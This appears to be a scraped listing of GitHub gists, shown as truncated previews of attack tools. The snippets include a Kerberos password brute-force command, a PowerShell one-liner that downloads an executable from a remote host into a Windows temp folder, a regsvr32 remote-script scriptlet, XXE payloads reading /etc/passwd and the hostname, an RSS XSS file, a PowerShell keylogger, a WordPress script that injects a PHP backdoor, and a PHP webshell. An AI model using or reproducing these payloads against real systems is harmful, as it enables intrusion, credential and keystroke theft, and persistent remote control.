Kerberos cheatsheet

Bruteforcing

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

S3cur3Th1sSh1t / Invoke-winPEAS.ps1

Created April 8, 2020 13:10

winPEAS in powershell

	function Invoke-winPEAS
	{

	[CmdletBinding()]
	Param (
	[Parameter(Position = 0, Mandatory = $true)]
	[ValidateNotNullorEmpty()]
	[String]
	$Command
	)

jakekarnes42 / host_getter.svg

Created August 13, 2019 23:44

An SVG "image" that uses an XXE attack to embed the hostname file of whichever system processes it into the image itself

Sorry, something went wrong. Reload?

Sorry, we cannot display this file.

Sorry, this file is invalid so it cannot be displayed.

intrd / powershell_wget_oneliner.ps1

Last active October 16, 2021 11:33

Powershell WGET one-liner (anyver)

	# Powershell oneliner wget (anyver)
	# http://dann.com.br/

	@powershell -NoProfile -ExecutionPolicy unrestricted -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.10.10:7000/iw4455.exe', 'C:\windows\temp\iw4455.exe')

enigma0x3 / Backdoor-Minimalist.sct

Last active March 9, 2025 06:49

Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...

	<?XML version="1.0"?>
	<scriptlet>
	<registration
	progid="PoC"
	classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!-- License: BSD3-Clause -->
	<script language="JScript">
	<![CDATA[

fyoorer / rss-xss.xml

Last active May 3, 2023 20:49

	<?xml version="1.0" encoding="UTF-8"?>
	<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:cc="http://web.resource.org/cc/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:media="http://search.yahoo.com/mrss/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
	<channel>
	<atom:link href="http://dataskeptic.libsyn.com/rss" rel="self" type="application/rss+xml"/>
	<title>Data Skeptic</title>
	<pubDate>Fri, 15 Jan 2016 15:00:00 +0000</pubDate>
	<lastBuildDate>Fri, 15 Jan 2016 15:08:58 +0000</lastBuildDate>
	<generator>Libsyn WebEngine 2.0</generator>
	<link>http://dataskeptic.com</link>
	<language>en</language>

dasgoll / gist:7ca1c059dd3b3fbc7277

Created December 11, 2015 16:44

Simple Windows Keylogger using PowerShell

	#requires -Version 2
	function Start-KeyLogger($Path="$env:temp\keylogger.txt")
	{
	# Signatures for API Calls
	$signatures = @'
	[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
	public static extern short GetAsyncKeyState(int virtualKeyCode);
	[DllImport("user32.dll", CharSet=CharSet.Auto)]
	public static extern int GetKeyboardState(byte[] keystate);
	[DllImport("user32.dll", CharSet=CharSet.Auto)]

sl4v / xxe.rss

Created October 30, 2015 07:03

	<?xml version="1.0" encoding="UTF-8"?>
	<!DOCTYPE title [ <!ELEMENT title ANY >
	<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
	<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
	<title>The Blog</title>
	<link>http://example.com/</link>
	<description>A blog about things</description>
	<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
	<item>

ethicalhack3r / backdoor.js

Last active May 3, 2023 16:53

wp backdoor exploit (injects a PHP backdoor)

	var wpnonce = '';

	function getCSRFNonce(callback)
	{
	var re = /<input type="hidden" id="_wpnonce" name="_wpnonce" value="(\w*)" \/>/

	var xhr = new XMLHttpRequest();
	xhr.open("GET", "http://mywordpress.com/wordpress/wordpress-475/wp-admin/theme-editor.php?file=index.php&theme=twentyseventeen", true);
	xhr.withCredentials = true;
	xhr.overrideMimeType('text/xml');

RyanKung / webshell.php

Last active March 22, 2022 05:19

a simple webshell

	<?php session_start(); ?>
	<?php

	if (empty($_SESSION['path'])) {
	$_SESSION['user'] = shell_exec('whoami');
	$_SESSION['host'] = shell_exec('hostname');
	$_SESSION['path'] = dirname(__FILE__);
	}
	function showInfo($cmd) {
	$user = $_SESSION['user'];